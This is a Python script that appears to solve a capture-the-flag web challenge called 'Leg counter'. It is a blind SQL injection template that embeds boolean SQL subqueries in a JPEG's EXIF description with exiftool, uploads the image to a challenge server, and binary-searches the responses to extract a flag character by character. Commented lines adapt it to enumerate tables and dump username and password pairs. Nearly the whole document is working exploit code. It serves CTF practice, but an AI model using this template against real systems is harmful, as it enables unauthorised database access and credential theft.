Leg counter web challenges solver (Blind SQLi Template)

legcountersolve.py

import requests
import re
from StringIO import StringIO
from pycurl import *
import os
import pickle

url = "http://103.56.207.107:50001/upload.php"

payload = {
    "Submit":"Deteksi",
	"token":"",
}

http_proxy  = "http://127.0.0.1:8080"
https_proxy = "https://10.10.1.11:1080"
ftp_proxy   = "ftp://10.10.1.10:3128"

proxyDict = { 
              "http"  : http_proxy, 
              "https" : https_proxy, 
              "ftp"   : ftp_proxy
            }

headers = {
"Cache-Control": "max-age=0", 
"Origin": "http://103.56.207.107:50001", 
"Upgrade-Insecure-Requests": "1", 
"Content-Type": "multipart/form-data", 
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", 
"Referer": "http://103.56.207.107:50001/", 
"Accept-Language": "en-US,en;q=0.9,de;q=0.8,es;q=0.7,id;q=0.6,ms;q=0.5", 
"Connection": "close",
"Cookie": "PHPSESSID=5d42tgrbtj0lifr04f02k3r1e6"
}

cookies = {"PHPSESSID": "5d42tgrbtj0lifr04f02k3r1e6"}

def check(data):
	return re.search("Satu kaki", data)

def getToken():
    req = requests.session()
    greptoken = req.get("http://103.56.207.107:50001/", headers=headers, proxies=proxyDict)
    token = str(re.search(r"type=\"hidden\" value=\"(.*)\"", greptoken.text).group(1).split("\"")[0]).strip()
    return token

def upload(token):
    c = Curl()
    d = StringIO()
    h = StringIO()
    c.setopt(URL, url)
    c.setopt(POST, 1)
    c.setopt(HTTPPOST, [('legpic', (FORM_FILE, '1leg.jpg')), ('submit', 'Deteksi'), ('token', str(token))])
    c.setopt(COOKIEFILE, 'cookie.txt')
    c.setopt(COOKIEJAR, 'cookie.txt')
    c.setopt(FOLLOWLOCATION, 1)
    c.setopt(PROXY, '127.0.0.1:8080')
    c.setopt(WRITEFUNCTION, d.write)
    c.setopt(HEADERFUNCTION, h.write)
    c.perform()
    c.close()
    return d.getvalue()

def blind(kolom,table):
    passwd = ""
    idx = 1

    while (True):
        lo = 1
        hi = 255
        temp = -1
        while(lo <= hi):
            mid = (lo + hi) / 2
            # command = "exiftool -ImageDescription=\"leg=(SELECT CASE when hex(substr({},{},1)) <= hex(char({})) THEN 1 ELSE 2 END FROM {})\" 1leg.jpg".format(str(kolom),str(idx),str(mid),str(table))
            command = "exiftool -ImageDescription=\"leg=(SELECT CASE when hex(substr({},{},1)) <= hex(char({})) THEN 1 ELSE 2 END FROM {})\" 1leg.jpg".format(str(kolom),str(idx),str(mid),str(table))
            os.system(command)
            res = upload(getToken())
            #print command
            #print res
            if check(res):
               hi = mid-1
               temp = mid
            else:
               lo = mid+1
               
        if (hi == 0): break
        passwd += chr(temp)
        print "Result [{}]: {}".format(table,passwd)
        idx += 1

    return passwd
   



blind("flaag","mysecretflaag")
# blind("name","sqlite_master")
# blind("sql","sqlite_master where sql like(char(37,102,108,97,103,37))")
# PRAGMA table_info(sqlite_master);
#CREATE TABLE Legs (Id INTEGER PRIMARY KEY, Session TEXT UNIQUE, Leg INTEGER)
# get table name   
# blind("group_concat(table_name)", "information_schema.tables where table_schema!=0x696e666f726d6174696f6e5f736368656d61")
# blind("group_concat(table_name)", "information_schema.tables order by table_schema desc")
# Result: users
# 
# get column name
# username,password
# blind("group_concat(column_name)", "information_schema.columns where table_name='users'")
# blind("group_concat(column_name)", "information_schema.columns where table_name='Login'")
# blind("group_concat(column_name)", "information_schema.columns where table_name='Flag'")

# get data
# blind("group_concat(username,0x3a,password)", "users")
# blind("group_concat(username,password)", "Login")
# blind("group_concat(username,password)", "Flag")